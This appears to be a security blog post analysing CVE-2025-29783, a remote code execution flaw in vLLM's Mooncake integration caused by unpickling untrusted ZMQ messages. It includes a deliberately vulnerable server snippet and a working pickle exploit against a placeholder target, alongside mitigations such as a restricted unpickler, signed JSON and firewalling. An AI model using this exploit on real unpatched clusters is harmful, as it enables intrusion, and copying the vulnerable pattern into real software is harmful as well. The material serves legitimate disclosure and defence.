CVE-2025-29783 - Critical Remote Code Execution Vulnerability in vLLM with Mooncake (Exploit & Deep Dive)

A critical remote code execution (RCE) vulnerability, CVE-2025-29783, affects vLLM when it is configured with Mooncake for distributed serving. Unless you have upgraded to vLLM 0.8.0 or later, attackers can execute arbitrary code on any reachable vLLM node by abusing unsafe deserialization exposed over ZMQ/TCP. In this post, we'll walk through what happened, look at a real exploit example, and review how to secure your clusters.

What Are vLLM and Mooncake?

vLLM (<https://github.com/vllm-project/vllm>) is a fast, memory-efficient serving engine for large language models. It enables scalable, high-throughput LLM inference and supports a wide range of model architectures, including GPT-style models.

Mooncake is a KV (key-value) cache store that vLLM can use to support distributed inference across multiple nodes. For coordination, the nodes communicate with each other over ZMQ/TCP sockets.

The Vulnerability: Unsafe Deserialization over the Network

When vLLM is started with Mooncake enabled, worker nodes accept serialized task/control objects over a network-accessible ZMQ/TCP interface. The critical oversight: before vLLM 0.8.0, Mooncake deserialized received data without any input validation or authentication.

Attackers can exploit this by sending crafted payloads that, when deserialized, will execute arbitrary Python code on the target host.

Affected versions: all vLLM releases prior to 0.8.0 that use Mooncake in distributed setups.

- Vulnerable out of the box when Mooncake is enabled and its port is not firewalled or otherwise isolated.
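As a quick first check, you can compare the installed vLLM version against 0.8.0 using the standard library's `importlib.metadata`. This is a minimal sketch under stated assumptions: the helper names `parse_release` and `is_vulnerable_version` are hypothetical, pre-release and local suffixes (such as `rc1` or `+cu121`) are ignored, and the check cannot tell whether Mooncake is actually enabled in your deployment.

```python
import re
from importlib.metadata import PackageNotFoundError, version

# First release containing the fix, as stated in this post.
FIXED_VERSION = (0, 8, 0)


def parse_release(ver: str) -> tuple:
    """Extract (major, minor, patch) from a version string (hypothetical helper).

    Suffixes such as "rc1", ".dev5", ".post1" or "+cu121" are ignored, so
    "0.8.0rc1" is treated as 0.8.0. This is a deliberate simplification.
    """
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", ver)
    if m is None:
        raise ValueError(f"unrecognized version string: {ver!r}")
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def is_vulnerable_version(ver: str) -> bool:
    """True if the release predates the fix. Does NOT check whether Mooncake is used."""
    return parse_release(ver) < FIXED_VERSION


if __name__ == "__main__":
    try:
        installed = version("vllm")
    except PackageNotFoundError:
        print("vLLM is not installed in this environment")
    else:
        if is_vulnerable_version(installed):
            print(f"vLLM {installed}: vulnerable if Mooncake is enabled, upgrade to 0.8.0+")
        else:
            print(f"vLLM {installed}: includes the fix")
```

A version string alone is only a hint; confirm separately whether your cluster is configured to use Mooncake.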

Where’s the Problem?

Here’s a simplified snippet (representative, not verbatim) to show the pattern for unsafe deserialization in Mooncake’s ZMQ worker code:

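```python
import pickle

import zmq


def handle(data):
    # Placeholder for the worker's real request handling (illustrative only).
    return {"ok": True, "received": type(data).__name__}


context = zmq.Context()
socket = context.socket(zmq.REP)
socket.bind("tcp://0.0.0.0:5555")  # Listens on all interfaces!

while True:
    b = socket.recv()            # Receives bytes from anyone!
    data = pickle.loads(b)       # UNSAFE: deserializes untrusted bytes, which can run arbitrary code
    result = handle(data)
    socket.send(pickle.dumps(result))
```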

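The code above passes every message received on the socket straight to `pickle.loads`. Unpickling can call arbitrary functions (an object's `__reduce__` method names a callable and its arguments, and the unpickler invokes it), so pickle must never be used on data from untrusted sources.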
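If a component cannot drop pickle immediately, the Python documentation's "Restricting Globals" pattern limits which classes and functions a pickle may reference by overriding `Unpickler.find_class`. The sketch below is illustrative and is not vLLM's actual fix; the `ALLOWED_GLOBALS` entries are hypothetical placeholders. Allowlisting is defense in depth, and a data-only format such as JSON remains the safer choice.

```python
import io
import pickle

# Hypothetical allowlist: the only (module, name) globals a message may reference.
# Plain dicts, lists, strings and numbers need no globals at all.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses to import anything outside ALLOWED_GLOBALS."""

    def find_class(self, module, name):
        # find_class is called for every global the pickle references,
        # before any of them can be invoked.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Replacement for pickle.loads that enforces the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

In the vulnerable loop, `data = restricted_loads(b)` would replace `pickle.loads(b)`; a payload referencing `os.system`, like the one in the exploit below, would then be rejected before anything runs.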

The Exploit

Sending a malicious pickle payload that executes arbitrary shell commands is trivial. Here's a minimal proof of concept that runs a harmless command on the target host:

Exploit Code: Remote Code Execution Example

```python
import os
import pickle

import zmq


# Build a malicious payload (runs a harmless `touch` command as a proof of concept)
class Exploit(object):
    def __reduce__(self):
        # Tells the unpickler to "rebuild" this object by calling os.system(<command>)
        return (os.system, ('touch /tmp/vllm_hacked',))


payload = pickle.dumps(Exploit())

# Send to the target Mooncake server
context = zmq.Context()
s = context.socket(zmq.REQ)
s.connect("tcp://TARGET_HOST:5555")
s.send(payload)
resp = s.recv()  # (optional: read server response)
```

Result: The Mooncake worker on TARGET_HOST will execute touch /tmp/vllm_hacked, silently creating a file and demonstrating code execution.

> More damaging payloads, such as reverse shells or ransomware, would work just as easily!

Mitigation & Fix

This vulnerability was fixed in vLLM 0.8.0.
- The developers replaced the unsafe deserialization, likely with a safe format such as JSON, custom codecs, or an explicit allowlist.
- Network authentication/gating is now possible.
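To illustrate both ideas (a data-only format plus message authentication), here is a minimal sketch of signed JSON messages built only on the standard library. It is an assumption-laden example, not vLLM's actual patch: `SHARED_KEY`, `encode_message`, `decode_message` and the `"op"` field check are hypothetical. JSON parsing never executes code, and the HMAC-SHA256 tag rejects messages from senders without the key.

```python
import hashlib
import hmac
import json

# Hypothetical shared secret. In practice, load it from a secrets manager or
# environment variable; never hard-code it.
SHARED_KEY = b"replace-with-a-long-random-secret"
TAG_LEN = hashlib.sha256().digest_size  # 32 bytes


def encode_message(msg: dict, key: bytes = SHARED_KEY) -> bytes:
    """Serialize a dict to JSON and prepend an HMAC-SHA256 tag over the body."""
    body = json.dumps(msg, separators=(",", ":"), sort_keys=True).encode("utf-8")
    tag = hmac.new(key, body, hashlib.sha256).digest()
    return tag + body


def decode_message(frame: bytes, key: bytes = SHARED_KEY) -> dict:
    """Verify the tag first, then parse JSON and validate its shape."""
    if len(frame) < TAG_LEN:
        raise ValueError("frame too short")
    tag, body = frame[:TAG_LEN], frame[TAG_LEN:]
    expected = hmac.new(key, body, hashlib.sha256).digest()
    # Constant-time comparison avoids leaking tag bytes through timing.
    if not hmac.compare_digest(tag, expected):
        raise ValueError("bad signature")
    msg = json.loads(body)
    # Hypothetical schema check: reject anything that is not {"op": <str>, ...}.
    if not isinstance(msg, dict) or not isinstance(msg.get("op"), str):
        raise ValueError("malformed message")
    return msg
```

In a ZMQ loop, the worker would call `decode_message(socket.recv())` and reply with `socket.send(encode_message(result))`. Note that this sketch has no replay protection or encryption, and JSON suits control messages better than bulk tensor data; ZeroMQ's built-in CURVE security mechanism is another option for authenticating and encrypting the transport.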

### How to Fix / Protect Yourself

1. Upgrade to vLLM 0.8.0 or later.
2. Always deploy behind firewalls, and restrict network access to trusted hosts.
3. For clusters that cannot be upgraded right away, use firewalls (host iptables rules, cloud security groups) to block access to the Mooncake ZMQ ports from untrusted networks.
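After changing firewall rules, it is worth verifying them from a machine that should *not* have access. The helper below is a minimal sketch (the name `port_is_reachable` is hypothetical) that simply attempts a TCP connection; port 5555 matches the illustrative snippet above and may differ in your deployment. A `False` result means the port is blocked *or* nothing is listening, so run the check while the worker is up.

```python
import socket


def port_is_reachable(host: str, port: int, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within `timeout` seconds.

    Run this from outside the trusted network: True means the port is exposed.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, unreachable, or timed out (socket.timeout is an OSError)
        return False
```

For example, `port_is_reachable("TARGET_HOST", 5555)` should return `False` from an untrusted host once the firewall rules are in place.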

References & Further Reading

- vLLM Official Repository: <https://github.com/vllm-project/vllm>
- vLLM 0.8.0 Release Notes: <https://github.com/vllm-project/vllm/releases/tag/v0.8.0>
- ZMQ Security Pitfalls
- Python pickle security warning: <https://docs.python.org/3/library/pickle.html>

CVE-ID: CVE-2025-29783

Conclusion

CVE-2025-29783 in vLLM's Mooncake integration is a textbook example of the dangers of deserializing untrusted data over the network. If you run distributed vLLM deployments with Mooncake, patch immediately! If you can't upgrade yet, at least firewall Mooncake's ports and restrict access.

Stay safe, and validate those inputs!

*— This analysis was compiled exclusively for the LLM security community.*


Timeline

Published on: 03/19/2025 16:15:32 UTC
Last modified on: 03/22/2025 01:15:30 UTC